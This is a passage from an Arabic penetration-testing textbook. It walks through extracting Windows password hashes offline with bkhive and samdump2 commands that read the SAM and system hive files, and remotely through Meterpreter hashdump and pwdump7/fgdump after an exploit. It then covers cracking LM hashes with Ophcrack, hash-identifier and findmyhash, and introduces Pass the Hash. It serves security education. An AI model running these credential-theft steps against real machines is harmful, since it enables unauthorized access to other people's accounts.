‫ﻟﺗﺷﻐﯾل‪ ، bkhive‬ﻓﻧﺣن ﻓﻲ ﺣﺎﺟﺔ ﻟﺗوﻓﯾر ﻧظﺎم اﻟﻣﻠﻔﺎت واﺳم اﻟﻣﻠف اﻟﻧﺎﺗﺞ واﻟﺗﻲ ﺳوف ﯾﺣﺗوي ﻋﻠﻰ اﻟﻣﻔﺗﺎح اﻟﻣﺳﺗﺧرﺟﺔ‪ .‬ﻟﺣﺳن اﻟﺣظ‪،‬‬
‫وﻛﻣﺎ ذﻛر‪ ،‬ﻓﺈن ﻣﺎﯾﻛروﺳوﻓت ﻧوع ﻣﺎ ﯾﻛﻔﻲ ﻟﻠﺣﻔﺎظ ﻋﻠﻰ اﻟﻣﻠف "‪ "system‬اﻟﻣﻠف ﻓﻲ ﻧﻔس اﻟﻣﺟﻠد اﻟذي ﯾوﺟد ﻓﯾﮫ اﻟﻣﻠف ‪ .SAM‬ﻛﻣﺎ‬
‫ﻧوﻗش ﺳﺎﺑﻘﺎ‪ ،‬وﻋﺎدة ﻣﺎ ﯾوﺟد ھذا اﻟﻣﻠف ﻓﻲ اﻟﻣﺟﻠد‪. Windows/system32/config‬‬
‫ﻋﻠﻰ اﻓﺗراض إﻧك ﺑﺎﻟﻔﻌل ﻓﻲ اﻟﻣﺟﻠد اﻟذي ﯾﺣﺗوي ﻋﻠﻰ اﻟﻣﻠف ‪ system‬وﻣﻠﻔﺎت ‪ ،SAM‬ﯾﻣﻛﻧك اﻻﺳﺗﻔﺎدة ‪ bkhive‬ﻻﺳﺗﺧراج اﻟﻣﻔﺗﺎح ﻣﻊ‬
‫اﻷﻣر اﻟﺗﺎﻟﻲ‪:‬‬
‫‪#bkhive system sys_key.txt‬‬
‫ﻋﻧد ھذه اﻟﻧﻘطﺔ ﯾﻣﻛﻧﻧﺎ ﻣواﺻﻠﺔ ھﺟوﻣﻧﺎ ﺑﺎﺳﺗﺧدام ‪ .Samdump2‬ﻓﻲ ھذه اﻟﺣﺎﻟﺔ‪ ،‬ﻓﺳوف ﯾﺳﺗﻔﺎد ‪ Samdump2‬ﻣن اﻟﻣﻠف‬
‫‪ sys_key.txt‬اﻟﺗﻲ أﻧﺷﺋت ﺣدﯾﺛﺎ ﻟدﯾﻧﺎ ﻛﻣﺎ ھو ﻣﺑﯾن أدﻧﺎه‪.‬‬
‫‪#samdump2 SAM sys_key.txt > /tmp/hash.txt‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪344‬‬

‫اﻵن ﻟدﯾﻧﺎ ھﺎش ﻛﻠﻣﺔ اﻟﻣرور اﻟﻣﺣﻔوظﺔ‪ ،‬ﻓﻧﺣن ﺑﺣﺎﺟﺔ إﻟﻰ ﻧﻘﻠﮭﺎ ﻣن اﻟﻘرص ﻛﺎﻟﻲ اﻟﺣﻲ‪ .‬وﯾﻣﻛن أن ﯾﺗم ھذا ﺑﺑﺳﺎطﺔ ﻋن طرﯾﻖ إرﺳﺎل اﻟﻣﻠف‬
‫‪ hash.txt‬ﻋن طرﯾﻖ اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﯾﺔ ﻟﻧﻔﺳك أو إدراج ﻣﺣرك أﻗراص ‪ USB‬وﺧﻠﻖ ﻧﺳﺧﺔ ﻣﺣﻠﯾﺔ ﻣن اﻟﮭﺎش‪ .‬ﻓﻲ ﻛﻠﺗﺎ اﻟﺣﺎﻟﺗﯾن‪ ،‬ﺗﺄﻛد ﻣن‬
‫ﺣﻔظ اﻟﻣﻠف ‪ hashes.txt‬ﻷﻧك ﺗﻌﻣل ﻣن ﻗرص ﻣﺿﻐوط "‪ "Live CD‬واﻟﺗﻐﯾﯾرات ﻟﯾﺳت ﻣﺳﺗﻣرة‪ .‬وھذا ﯾﻌﻧﻲ إﻧﮫ ﻋﻧد إﻋﺎدة ﺗﺷﻐﯾل اﻟﺟﮭﺎز‬
‫اﻟﮭدف‪ ،‬ﺳﺗزول ﺟﻣﯾﻊ اﻟﻣﻠﻔﺎت اﻟﺗﻲ ﺗم إﻧﺷﺎؤھﺎ ﻓﻲ اﻟﻘرص ﻛﺎﻟﻲ‪ .‬ﻣﻊ ﻣﻠف ھﺎش ﻛﻠﻣﺔ اﻟﺳر ﻟﻠﻧظﺎم اﻟﺗﻲ ﺗﺳﺗﮭدﻓﮫ ﻓﻲ ﻣﺗﻧﺎول اﻟﯾد‪ ،‬ﯾﻣﻛﻧك اﻟﺑدء‬
‫ﻓﻲ ﻋﻣﻠﯾﺔ ﻛﺳر ﻛﻠﻣﺎت اﻟﺳر‪.‬‬

‫ﻣﻠﺣوظﮫ‪:‬‬
‫ﻗد ﻗﻠﻧﺎ ﻣن ﻗﺑل اﻧﮫ ﯾوﺟد ﻧوﻋﯾن ﻣن اﻟﮭﺎش‪ ،‬ﺣﯾث اﻧﮫ ﻋﻧدﻣﺎ ﯾﻛون اﻟﮭﺎش ‪ LM‬ﻣﻔﻌل ﻣﺛل أﻧظﻣﺔ اﻟﺗﺷﻐﯾل ‪ XP‬واﻻﺻدارات اﻷﻗل ﻓﺎن ﺷﻛل‬
‫اﻟﮭﺎش ﺳوف ﯾﻛون ھﻛذا‪.‬‬

‫اﻣﺎ إذا ﻛﺎن اﻟﮭﺎش ‪ LM‬ﻏﯾر ﻣﻔﻌل ﻛﻣﺎ ﻓﻲ إﺻدارات وﯾﻧدوز ﻓﺳﺗﺎ و‪ 7‬واﻻﺻدارات اﻻﺣدث ﻓﯾﻛون ﺷﻛل اﻟﮭﺎش ﻛﺎﻻﺗﻰ‪:‬‬

‫‪Extracting Windows Password Hashes Remotely‬‬


‫اﻵن ﻟدﯾك ﻓﮭم ﻋﻣﯾﻖ ﻟﻛﺳر ﻛﻠﻣﺔ اﻟﺳر ﻣن ﻣﻧظور اﻟﻣﮭﺎﺟم اﻟﻣﺣﻠﻲ‪ ،‬دﻋوﻧﺎ ﻧﺄﺧذ ﺑﺿﻊ دﻗﺎﺋﻖ ﻟﻣﻧﺎﻗﺷﺔ اﻟﺣﺻول ﻋﻠﻰ ھﺎش ﻛﻠﻣﺔ اﻟﻣرور ﻋن ﺑﻌد‬
‫‪ .remotely‬ﻛﺳر ﻛﻠﻣﺎت اﻟﺳر ﻋﻠﻰ اﻷﻧظﻣﺔ اﻟﺑﻌﯾدة ﯾﺗم ﺑﻌدة طرق‪:‬‬
‫‪Man in the Middle attack‬‬

‫ﺣﯾث ﯾﻣﻛﻧك اﺳﺗﺧدام ‪ ettercap‬وھﺟﻣﺎت رﺟل ﻓﻲ اﻟﻣﻧﺗﺻف ﻟﻠﺗﺟﺳس ﻋﻠﻰ اﺳم اﻟﻣﺳﺗﺧدم وﻛﻠﻣﺔ اﻟﻣرور ﻋﺑر اﻟﺷﺑﻛﺔ‪ .‬ﺳوف ﻧﺗطرق ﻟﺷرح‬
‫‪ ettercap‬ﻻﺣﻘﺎ‪ .‬ھﻧﺎك اﻟﻛﺛﯾر اﻟذي ﯾﻣﻛن اﻟﻘﯾﺎم ﺑﮫ ﺑواﺳطﺔ ‪ ettercap‬وھﻧﺎك اﻟﻌدﯾد ﻣن اﻟدروس اﻟﺗﻲ ﺗﻐطﻲ ﻛﯾﻔﯾﺔ اﺳﺗﺧداﻣﮭﺎ!‬
‫‪Metasploit / hashdump‬‬

‫ﻛﺳر ﻛﻠﻣﺎت اﻟﺳر ﻋﻠﻰ اﻷﻧظﻣﺔ اﻟﺑﻌﯾدة ﻋﺎدة ﻣﺎ ﯾﺗم اﻟﻘﯾﺎم ﺑﮭﺎ ﻋن ﺑﻌد وﺗﻛون ﺑﻌد أطﻼق ‪ exploit‬ﺑﻧﺟﺎح ﺿد اﻟﺟﮭﺎز اﻟﮭدف‪ .‬ﻓﻲ ﻣﺛﺎﻟﻧﺎ‬
‫اﻟﺳﺎﺑﻖ‪ ،‬ﻋﻧدﻣﺎ ﺗﺣدﺛﻧﺎ ﻋن اﺳﺗﺧدام ‪ Metasploit‬ﻹطﻼق ﺣﻣوﻟﺔ ‪ VNC‬ﻋﻠﻰ ھدﻓﻧﺎ اﻟﺑﻌﯾد‪ .‬ﻓﻲ ﺣﯾن أن ﺣﻣوﻟﺔ ‪ VNC‬ھو ﺑﺎﻟﺗﺄﻛﯾد ﻣﻣﺗﻌﺔ‪،‬‬
‫وﻟﻛﻧﻧﺎ ﺳوف ﻧﺣﺗﺎج اﻟﻰ ﻗذﯾﻔﺔ ‪ .Meterpreter‬وﺳوف ﺗﺳﺗﺧدم ‪ Metasploit‬ﻟﻠﺣﺻول ﻋﻠﻰ ﺷل ﻋن ﺑﻌد ﻋﻠﻰ اﻟﮭدف واﻟﺗﻲ ﺗوﻓر ﻟﻧﺎ‬
‫اﻟوﺻول إﻟﻰ اﻟﻌدﯾد ﻣن أواﻣر اﻟﺗرﻣﻧﺎل )ﺑﯾن أﻣور أﺧرى( واﻟﺗﻲ ﺗﺳﮭل ﺟﻣﻊ ھﺎش ﻛﻠﻣﺎت اﻟﻣرور ﺑﺳﮭوﻟﮫ‪ .‬ﺑﻌد ﺗﺷﻐﯾل ﺟﻠﺳﺔ ‪Meterpreter‬‬
‫ﻋﻠﻰ اﻟﮭدف اﻟﺧﺎص ﺑك‪ ،‬ﺑﺑﺳﺎطﺔ ﻧدﺧل اﻷﻣر " ‪ Meterpreter.“ hashdump‬ﺳوف ﯾﺗﺟﺎوز ﺟﻣﯾﻊ اﻵﻟﯾﺎت اﻷﻣﻧﯾﺔ اﻟﻘﺎﺋﻣﺔ ﻟوﯾﻧدوز‬
‫وﺳوف ﺗﻘدم ﻟك اﺳم اﻟﻣﺳﺗﺧدم اﻟﻣﺳﺗﮭدف و اﻟﮭﺎش اﻟﻣﻘﺎﺑل ﻟﮫ‪.‬‬

‫ﻟﺳﮭوﻟﺔ اﻻﻣر ﺳوف ﻧﺳﺗﺧدم اﻷداة ‪ armitage‬واﻟﺗﻲ ﺗﻌﺗﺑر اﻟوﺟﮫ اﻟرﺳوﻣﯾﺔ ﻟل ‪ metasploit‬واﻟﺗﻲ ﻣن ﺧﻼﻟﮭﺎ ﺳوف ﻧﻘوم ﺑﺈطﻼق‬
‫‪ exploit‬ﻧﺎﺟﺢ ﻋﻠﻰ اﻟﺟﮭﺎز اﻟﮭدف ﺛم ﻧﻧﺷﺊ ‪ meterpreter session‬ﻧﺎﺟﺢ ﻋﻠﯾﮫ ﻛﺎﻻﺗﻰ‪:‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪345‬‬

‫ﺑﻌد إطﻼق ‪ exploit‬ﻧﺎﺟﺢ ﻋﻠﻰ اﻟﺟﮭﺎز اﻟﮭدف وﻓﺗﺢ ‪ meterpreter session‬ﻋﻠﯾﮫ ﻧﻘوم ﺑﻛﺗﺎﺑﺔ اﻻﻣر ‪ hashdump‬ﻛﺎﻻﺗﻰ‪:‬‬

‫ﯾﻣﻛﻧك أﯾﺿﺎ اﺳﺗﺧدام ﻛﻼ ﻣن ‪ pwdump7‬او ‪ fgdump‬وﯾﻛون اﺳﺗﺧداﻣﮭم ﻛﺎﻻﺗﻰ‪:‬‬


‫‪ -‬ﺑﻌد إطﻼق ‪ exploit‬ﻧﺎﺟﺢ واﺧﺗراق اﻟﻧظﺎم اﻟﮭدف‪.‬‬
‫‪ -‬ﻧﻘوم ﺑﻔﺗﺢ ‪ session‬ﻟل ‪.meterpreter‬‬
‫‪ -‬ﻧﻘوم ﺑﺗﺣﻣﯾل ﻣﻠف اﻟﻧﺳﺧﺔ اﻟﻣﺧﺻﺻﺔ ﻟﻠﻌﻣل ﻋﻠﻰ اﻟوﯾﻧدوز ‪ pwdump7‬او ‪ fgdump‬ﻋﻠﻰ اﻟﻧظﺎم اﻟﮭدف ﻛﺎﻻﺗﻰ‪:‬‬

‫ﻧﻘوم اﻻن ﺑﺗﺷﻐﯾل ‪ CMD‬ﻋﻠﻰ ‪ meterpreter‬ﻋﻠﻰ اﻟﻧظﺎم اﻟﮭدف ﻛﺎﻻﺗﻰ‪:‬‬ ‫‪-‬‬

‫‪ -‬ﺛم ﻧﻘوم ﺑﺗﺷﻐﯾل اﻻﻣر ‪ pwdump7‬ﻛﻣﺎ ﻓﻌﻼ ﺳﺎﺑﻘﺎ‪.‬‬


‫ﻣﻠﺣوظﮫ‪ pwdump7 :‬ﻻ ﺗﻌﻣل ﻣﻊ ﻧظﺎم اﻟﺗﺷﻐﯾل وﯾﻧدوز ‪xp‬ﻟذﻟك ﯾﻔﺿل اﺳﺗﺧدام ‪ pwdump6‬ﻓﻲ ﺣﺎل ﻧظﺎم اﻟﺗﺷﻐﯾل وﯾﻧدوز ‪.xp‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪346‬‬

‫اﻻن ﺑﻌد ان ﺣﺻﻠﻧﺎ ﻋﻠﻰ اﻟﮭﺎش ﻣﺎذا ﻧﻔﻌل؟‬


‫ﻛﻣﺎ ﻗﻠﻧﺎ ﺳﺎﺑﻘﺎ اﻟﺣﺻول ﻋﻠﻰ اﻟﮭﺎش ھو ﻧﺻف اﻟﻣﻌرﻛﺔ ﻧﻧﺗﻘل اﻻن اﻟﻰ ﻛﺳر ھﺎش ﻛﻠﻣﺔ اﻟﻣرور وﻣﻌرﻓﺔ ﻛﻠﻣﺔ اﻟﻣرور اﻟﺻﺣﯾﺣﺔ ﺑﺷﻛل واﺿﺢ‪.‬‬

‫‪Cracking Simple Lm Hashes‬‬


‫ﻣﻘﺪﻣﮫ‪:‬‬
‫ﻛﻠﻧﺎ ﻧﻌﻠم ﺟﻣﯾﻌﺎ ان دﻋم ﻣﺎﯾﻛروﺳوﻓت ﻟﻧظﺎم اﻟﺗﺷﻐﯾل ‪ Windows XP SP3‬و ‪Office 2003‬أﻧﺗﮭﻰ رﺳﻣﯾﺎ ﻓﻲ ‪ 8‬أﺑرﯾل ‪ .2014‬ﻣﺎ ﯾﻘرب‬
‫ﻣن ‪ ٪ 40‬ﻣن ﻣﺳﺗﺧدﻣﻲ اﻟﻛﻣﺑﯾوﺗر ﻻ ﺗزال ﺗﺳﺗﺧدم وﻓﻘﺎ ﻟﺑﻌض اﻟﺗﻘﺎرﯾر‪ .‬وھذا ﻋدد ﺿﺧم ﻣن أﻧظﻣﺔ وﯾﻧدوز ‪ XP‬اﻟﺗﻲ ﻻ ﺗزال ﺗﺳﺗﺧدم ﻓﻲ‬
‫ﻣﺟﺎل اﻷﻋﻣﺎل اﻟﺗﺟﺎرﯾﺔ‪ .‬أﺟﮭزة اﻟﻛﻣﺑﯾوﺗر ﻻ ﺗﺧزﯾن ﻛﻠﻣﺎت اﻟﻣرور ﻓﻲ ﻧص ﻋﺎدي‪ ،‬وﻟﻛن ﺗﺧزﯾﻧﮭﺎ ﻓﻲ ﺷﻛل ﻣﺷﻔر ﻛﻣﺎ ذﻛرﻧﺎ ﺳﺎﺑﻘﺎ‪ .‬ھﻧﺎك‬
‫اﻟﻌدﯾد ﻣن اﻟطرق اﻟﻣﺧﺗﻠﻔﺔ اﻟﺗﻲ ﺗﺳﺗﺧدﻣﮭﺎ اﻟﺣواﺳﯾب ﻟﺗﺷﻔﯾر ﻛﻠﻣﺎت اﻟﻣرور اﻟﺧﺎﺻﺔ ﺑﮭم‪ .‬واﺣدة ﻣن أﻛﺛر اﻟطرق أﻣﺎﻧﺎ ھﻲ ‪ salting‬ﻟﻛﻠﻣﺔ‬
‫اﻟﻣرور‪ .‬ﺗﺳﺗﺧدم اﻟﻌدﯾد ﻣن أﻧظﻣﺔ وﯾﻧدوز ‪ XP‬ھﺎش ﻣن اﻟﻧوع ‪ LM‬ﻟﺣﻣﺎﯾﺔ ﻛﻠﻣﺎت اﻟﻣرور اﻟﺧﺎﺻﺔ ﺑﮭم‪ .‬ھذا ھو وﺳﯾﻠﺔ ﻗدﯾﻣﺔ ﺟدا وﻋﻔﺎ ﻋﻠﯾﮭﺎ‬
‫اﻟزﻣن ﻟﺗﺧزﯾن ھﺎش ﻛﻠﻣﺔ اﻟﻣرور‪ .‬ﺗم إﻧﺷﺎء ھذه اﻟﻌﻣﻠﯾﺔ ﻟﻸﻧظﻣﺔ ﻗﺑل ظﮭور وﯾﻧدوز ‪.NT‬‬
‫‪Cracking Lm Passwords Online‬‬
‫ھﻧﺎك اﻟﻌدﯾد ﻣن اﻟﻣواﻗﻊ اﻟﺗﻲ ﺗﺳﻣﺢ ﻟك ﺑﺈدﺧﺎل ‪ Windows LM hash‬وﺳﯾﻌود اﻟﻣوﻗﻊ ﻟك ﺑﻛﻠﻣﺔ اﻟﻣرور اﻟﻣﺳﺗﺧدﻣﺔ )إذا ﻛﺎﻧت ﻓﻲ ﺟدول‬
‫اﻟﺑﺣث اﻟﺧﺎﺻﺔ ﺑﮫ(‪.‬‬
‫ﻗد وﺿﻌت ﺷرﻛﺔ اﻷﻣن اﻟﺳوﯾﺳرﯾﺔ واﻟﺗﻲ ﯾطﻠﻖ ﻋﻠﯾﮭﺎ ‪) Objectif Sécurité‬اﻟﺗﻲ أﻧﺷﺄت ‪ (Ophcrack‬ﺗﻘﻧﯾﺔ ﻟﻛﺳر ﻟﻛﻣﺎت اﻟﻣرور‬
‫ﺑﺎﺳﺗﺧدام ‪ Rainbow table‬ﻋﻠﻰ ﻣﺣرﻛﺎت أﻗراص ‪ .SSD‬أﻧﮭﺎ ﺗوﻓر ﻓﺗره ﺗﺟرﯾﺑﯾﮫ ﻋﻠﻰ ﺷﺑﻛﺔ اﻹﻧﺗرﻧت ﻣن ﺗﻛﻧوﻟوﺟﯾﺗﮭﺎ واﻟﺗﻲ ﺗﻌﻣل ﻋﻠﻰ‬
‫ﻛﺳر اﻟﻌدﯾد ﻣن ‪ LM Password‬ﻓﻲ ﺛوان ﻣﻌدودات‪.‬‬
‫‪http://www.objectif-securite.ch/en/ophcrack.php‬‬
‫ﺳﻧﺣﺎول اﺳﺗﺧدام ازواج ﻣن اﻟﮭﺎش وﻧرى ﻣﺎ ﯾﻣﻛن اﻟﻘﯾﺎم ﺑﮫ‪ .‬دﻋوﻧﺎ ﻧﺑدأ ﻣﻊ اﻟﺳﮭل‪ .‬ھﻧﺎ ھو ھﺎش ﻛﻠﻣﺔ اﻟﺳر ﻟﻣدﯾر ﻧظﺎم ﻋﻠﻰ ﺟﮭﺎز ‪:XP‬‬
‫‪Hash: aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0‬‬

‫اﻧظر ﻣﺎذا ﺣدث اﺳﺗطﺎع اﻟﺣﺻول ﻋﻠﻰ ﻛﻠﻣﺔ اﻟﻣرور وھﻲ ‪ Empty password‬اﻟﻣﻘﺎﺑﻠﺔ ﻟﻠﮭﺎش اﻟذي ادﺧﻠﻧﮭﺎ وﻗد اﺳﺗﻐرق وﻗﺗﺎ ﻻ ﯾزﯾد ﻋن‬
‫ﺛﺎﻧﯾﺗﯾن‪.‬‬
‫ﻓﻠﻧﺣﺎول اﻻن اﺳﺗﺧدام ھﺎش ذات ﺻﻌوﺑﺔ ﺑﺎﻟﻣﻘﺎرﻧﺔ ﺑﺎﻟﮭﺎش اﻟﺳﺎﺑﻖ ﻛﺎﻻﺗﻰ‪:‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪347‬‬

‫‪Hash: 17817c9fbf9d272af44dfa1cb95cae33:6bcec2ba2597f089189735afeaa300d4‬‬

‫ﻧﺟد اﻧﮫ اﺳﺗﻐرق ‪ 4‬ﺛواﻧﻲ ﻟﻌطﺎء اﻟﻧﺗﯾﺟﺔ‪ .‬ﻓﻠﻧﺣﺎول اﻻن اﺳﺗﺧدام ھﺎش أﺻﻌب ﻣن ذي ﻗﺑل ﺑﺎﻟﻣﻘﺎرﻧﺔ ﺑﺎﻟﮭﺎش اﻟﺳﺎﺑﻖ ﻛﺎﻻﺗﻰ‪:‬‬
‫‪Hash: d4b3b6605abec1a16a794128df6bc4da:14981697efb5db5267236c5fdbd74af6‬‬

‫ﻧﺟد اﻧﮫ اﺳﺗﻐرق ﻣن اﻟوﻗت ‪ 6‬ﺛواﻧﻲ ﻹﯾﺟﺎد ﻛﻠﻣﺔ اﻟﻣرور اﻟﻣﻘﺎﺑﻠﺔ ﻟﻠﮭﺎش‪.‬‬
‫ﻣؤﺛرة ﺟدا‪ ،‬ﻓﻠﻘد اﺳﺗﻐرق ﻓﻘط ‪ 7-4‬ﺛواﻧﻲ ﻓﻲ ھذا اﻻﺧﺗﺑﺎر ﻟﻛﺳر ﻋدد ﻣن ﻛﻠﻣﺎت اﻟﺳر اﻟﻣﻌﻘدة اﻟﻣﻛوﻧﺔ ﻣن ‪ 14‬ﺣرف‪ .‬ھذه اﻷداة ﻣﺧﺻﺻﮫ‬
‫ﻟﮭﺎش ‪ LM‬ﻓﻲ وﯾﻧدوز ‪ XP‬وﻟﯾﺳت ﻟوﯾﻧدوز ‪ /8/7‬ﺳﯾرﻓر ‪ 2008‬اﻟﺗﻲ ﺗﺳﺗﻧد ﻋﻠﻰ ھﺎش ‪NTLM‬اﻟذي ﯾﻌد أﻛﺛر أﻣﻧﻧﺎ‪.‬‬
‫وﻟﻛن‪ ،‬أﻋﺗﻘد أﻧﮫ ﻣﻊ زﯾﺎدة ﺳرﻋﺔ ﻛﺳر ﻛﻠﻣﺎت اﻟﻣرور‪ ،‬ﻓﺄن اﻻﻋﺗﻣﺎد ﻋﻠﻰ ﻛﻠﻣﺎت اﻟﻣرور وﺣدھﺎ ﻗد ﻻ ﺗﻛون ﻣﻘﯾﺎس أﻣﻧﻲ ﺟﯾد‪ .‬ﺣﯾث اﻟﻌدﯾد ﻣن‬
‫اﻟﺷرﻛﺎت واﻟﻣراﻓﻖ اﻟﺣﻛوﻣﯾﺔ اﺑﺗﻌدت ﻋن اﺳﺗﺧدام ﻛﻠﻣﺎت اﻟﻣرور وﺣدھﺎ ﻓﻘط واﺳﺗﺧدﻣت أﺳﺎﻟﯾب اﻟﻣﺻﺎدﻗﺔ اﻟﻣزدوﺟﺔ‪ .‬اﻟﻣﻘﺎﯾﯾس اﻟﺣﯾوﯾﺔ‬
‫)‪ (Biometrics‬واﻟﺑطﺎﻗﺎت اﻟذﻛﯾﺔ )‪ (smartcards‬أﺻﺑﺣت أﻛﺛر ﺷﻌﺑﯾﺔ ﻓﻲ أﻻﻣﺎﻛن اﻟﺗﻲ ﺗﺣﺗﺎج اﻟﻰ ﻣﺳﺗوﯾﺎت اﻣﻧﯾﮫ ﻋﺎﻟﯾﺔ‪.‬‬
‫ﻓﻠﻧﺣﺎول اﻻن اﺳﺗﺧدم اﻟﮭﺎش اﻟذي اﺳﺗﺧرﺟﻧﺎه ﻣن ﻗﺑل وﻣﻌرﻓﺔ ﻛﻠﻣﺔ اﻟﻣرور ﺑﺻورة واﺿﺣﺔ‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪348‬‬

‫‪Hash-identifier‬‬

‫ھﻲ أداة ﺑﺎﯾﺛون ﺗﺳﺗﺧدم ﻟﺗﺣدﯾد أﻧواع اﻟﮭﺎش وﻣدﻣﺟﺔ ﻣﻊ ﻧظﺎم اﻟﺗﺷﻐﯾل ﻛﺎﻟﻲ‪ .‬ﻣﻌظم أدوات ﻛﺳر ﻛﻠﻣﺎت اﻟﻣرور ﻣﺛل ‪John the Ripper‬‬
‫ﺗﺷﻣل وظﯾﻔﺔ اﻟﻛﺷف اﻟﺗﻠﻘﺎﺋﻲ ﻋن اﻟﮭﺎش اﻟﺗﻲ ھﻲ ﺟﯾدة ﺟدا‪ ،‬ورﺑﻣﺎ ‪ 90‬ﻓﻲ اﻟﻣﺋﺔ ﻧﺳﺑﺔ دﻗﺗﮭﺎ‪ .‬ھذه اﻷداة ﯾﻣﻛن اﺳﺗﺧداﻣﮭﺎ ﻟﻠﺗﺣﻘﻖ ﻣن ﻧوع‬
‫اﻟﮭﺎش ﯾدوﯾﺎ‪ .‬ﺑﺑﺳﺎطﺔ ﻧﻘوم ﺑﺗﺷﻐﯾل ‪ Hash ID‬وﻧدﺧل ﻣﻌﮫ اﻟﮭﺎش‪ .‬ھذا اﻟﺑرﻧﺎﻣﺞ ﺳوف ﯾﺗﺣﻘﻖ ﻣن ذﻟك وﯾﻌود اﻟﯾك ﺑﺎﻟﻧوع اﻻﻛﺛر ﺷﯾوﻋﺎ ﻣن‬
‫اﻟﮭﺎش اﻟﺗﻲ ﻟدﯾك ﺟﻧﺑﺎ إﻟﻰ ﺟﻧب ﻣﻊ أﻧواع اﻷﻗل اﺣﺗﻣﺎﻻ‪.‬‬
‫ﯾﻣﻛﻧك ﺗﺷﻐﯾل ھذه اﻷداة ﻣن ﻗﺎﺋﻣﺔ ادوات ﻛﺎﻟﻲ‪:‬‬
‫‪Kali LinuxPassword AttacksOffline AttacksHash-Identifier‬‬
‫ﻓﻘط ﻗم ﺑطﺑﺎﻋﺔ اﻟﮭﺎش و‪ Hash ID‬ﺳوف ﯾﻌود اﻟﯾك ﺑﻧوع ھذا اﻟﮭﺎش ﻛﺎﻻﺗﻰ‪:‬‬

‫‪Findmyhash‬‬
‫ھو ﺳﻛرﯾﺑت ﺑﺎﯾﺛون ﻣدﻣﺟﺔ ﻓﻲ ﻧظﺎم اﻟﺗﺷﻐﯾل ﻛﺎﻟﻲ‪ ،‬واﻟﺗﻲ ﺗﺳﺗﺧدم ﺧدﻣﺔ اﻻﻧﺗرﻧت اﻟﻣﺟﺎﻧﯾﺔ ﻟﻛﺳر اﻟﮭﺎش‪ .‬ﯾﺟب أن ﺗﻛون ﻣوﺻل إﻟﻰ اﻹﻧﺗرﻧت‬
‫ﻗﺑل اﺳﺗﺧدام ھذه اﻷداة‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪349‬‬

‫اﻟﺻﯾﻐﺔ اﻟﻌﺎﻣﺔ‪:‬‬
‫‪#findmyhash <Encryption> -h hash‬‬

‫‪Pass the HASH‬‬


‫ﻓﻲ اﻟﻣﻘطﻊ اﻟﺳﺎﺑﻖ ﺗﺣدﺛﻧﺎ ﻋن ﻛﯾﻔﯾﺔ ﻛﺳر ھﺎش ﻛﻠﻣﺎت اﻟﻣرور اﻟﻣﺳﺗﻧدة اﻟﻰ‪ ، Windows LM‬وﻟﻛن ﻣﺎذا ﻋن ﻛﻠﻣﺎت اﻟﻣرور اﻟﻣﺳﺗﻧدة اﻟﻰ‬
‫‪NTLM‬؟‬
‫أﻧظﻣﺔ وﯾﻧدوز ﻋﺎدة ﺗﺧزﯾن ھﺎش ‪ NTLM‬ﺟﻧﺑﺎ إﻟﻰ ﺟﻧب ﻣﻊ ھﺎش ‪ ،LM‬ھﺎش ‪ NTLM‬ﻛوﻧﮭﺎ أﻛﺛر أﻣﻧﺎ‪ .‬وﻛﻣﺎ ذﻛرت‪ ،‬ﯾﻣﻛن أن ﺗﻘوم‬
‫ﺑﺈﯾﻘﺎف ھﺎش ‪)LM‬أو ﺑﻣﺟرد اﺳﺗﺧدام ﻛﻠﻣﺎت ﺳر أطول ﻣن ‪ 14‬ﺣرﻓﺎ(‪ .‬وﻟﻛن ﻣﺎ ھﻲ اﻟﻣدة اﻟﺗﻲ ﺳوف ﺗﺳﺗﻐرق ﻟﻛﺳر ﻛﻠﻣﺎت اﻟﻣرور أذا‬
‫اﺳﺗﺧدم ‪ NTLM Hash‬ﻓﻘط؟‬
‫ھذا ھو اﻟﺳؤال اﻟﻛﺑﯾر‪ ،‬واﻟﺟواب ھو‪ ،‬إذا ﺗم اﺳﺗﯾﻔﺎء ظروف ﻣﻌﯾﻧﺔ‪ ،‬واﺳﺗﺧدام ﺗﻘﻧﯾﺔ ﻣﻌﯾﻧﺔ‪ ،‬ﻓﺈﻧﮫ ﯾﻣﻛن أن ﺗﺄﺧذ ﻧﻔس اﻟﻣﻘدار ﻣن اﻟوﻗت‪.‬‬
‫اﺳﻣﺣوا ﻟﻲ أن أﺷرح‪ ،‬إذا ﻛﻧت ﺗﺳﺗطﯾﻊ اﺳﺗرداد ‪ LM‬أو ‪ NT‬ھﺎش ﻣن ﺟﮭﺎز ﻛﻣﺑﯾوﺗر‪ ،‬ﻓﺄﻧك ﻻ ﺗﺣﺗﺎج ﻟﻛﺳر ھذا اﻟﮭﺎش‪ .‬ﺣﯾث ﻓﻲ ﺑﻌض‬
‫اﻷﺣﯾﺎن ﯾﻣﻛﻧك ﺑﺑﺳﺎطﺔ اﺗﺧﺎذ ھذا اﻟﮭﺎش ﻛﻣﺎ ھو واﺳﺗﺧداﻣﮫ ﻟﻠوﺻول إﻟﻰ اﻟﻧظﺎم‪ .‬وﺗﺳﻣﻰ ھذه اﻟﺗﻘﻧﯾﺔ "‪."Pass the Hash‬‬
